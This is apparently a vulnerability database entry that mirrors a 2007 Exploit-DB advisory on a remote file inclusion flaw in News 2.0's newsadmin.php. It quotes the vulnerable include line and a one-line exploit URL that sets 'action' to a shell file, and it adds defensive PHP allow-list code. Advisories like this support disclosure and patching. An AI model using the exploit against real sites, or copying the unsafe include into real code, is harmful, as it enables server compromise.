vendor: News 2.0
by: Mogatil
CVSS: 5.5 (MEDIUM)
CWE: Remote File Include
Product Name: News 2.0
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

News 2.0 (newsadmin.php) Remote File Include Vulnerabilities

The vulnerability allows an attacker to include and execute arbitrary files from remote servers through the 'newsadmin.php' script. The script passes the 'action' parameter to include() with ".inc.php" appended, so by manipulating 'action' in the URL an attacker can specify the file to be included and executed. In this case, the exploit sets 'action' to 'shell', the file used as the payload.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and validate the 'action' parameter to prevent remote file inclusion.
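
One way to implement the validation recommended above, as an added example that is not code from News 2.0 or from the original advisory: the 'action' value is matched against a fixed allow-list instead of being concatenated into include(). The action names, the includes/ directory and the resolve_action_file() helper are assumptions made for illustration.

```php
<?php
// Added example: allow-list dispatch for the 'action' parameter.
// The action names and the includes/ directory are hypothetical.

const ALLOWED_ACTIONS = [
    'list' => 'list.inc.php',
    'add'  => 'add.inc.php',
    'edit' => 'edit.inc.php',
];

function resolve_action_file($action, string $baseDir): ?string
{
    // Reject arrays (?action[]=x) and anything that is not an exact allow-list key.
    if (!is_string($action) || !array_key_exists($action, ALLOWED_ACTIONS)) {
        return null;
    }
    // The filename comes from the constant map, never from the request.
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . ALLOWED_ACTIONS[$action]);
    $base = realpath($baseDir);
    // Defence in depth: the resolved path must stay inside the include directory.
    if ($path === false || $base === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Read the parameter explicitly from the request instead of a bare $action variable.
$file = resolve_action_file($_GET['action'] ?? 'list', __DIR__ . '/includes');
if ($file === null) {
    http_response_code(400);
    exit('Unknown action');
}
include $file;
```

Setting `allow_url_include = Off` in php.ini stops include() from fetching remote URLs, but it does not prevent inclusion of local files, so the allow-list is still needed.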
Source

Exploit-DB raw data:

####################### S==A==U==D==I #########################

News 2.0 (newsadmin.php) Remote File Include Vulnerabilities

##############################################################

Found By : Mogatil , jjl@hotmail.com

##############################################################

Script Site :
http://www.tools4web.de/zaehler.php?i=5
##############################################################
File : /newsadmin.php

include($action.".inc.php");

##############################################################

Thanx: [cold zero] [gawey] [crazy man] [scorbion_22] [the_muslim_sniper]

##############################################################

Exploit :[Path]/newsadmin.php?action=shell

##############################################################

# milw0rm.com [2007-05-14]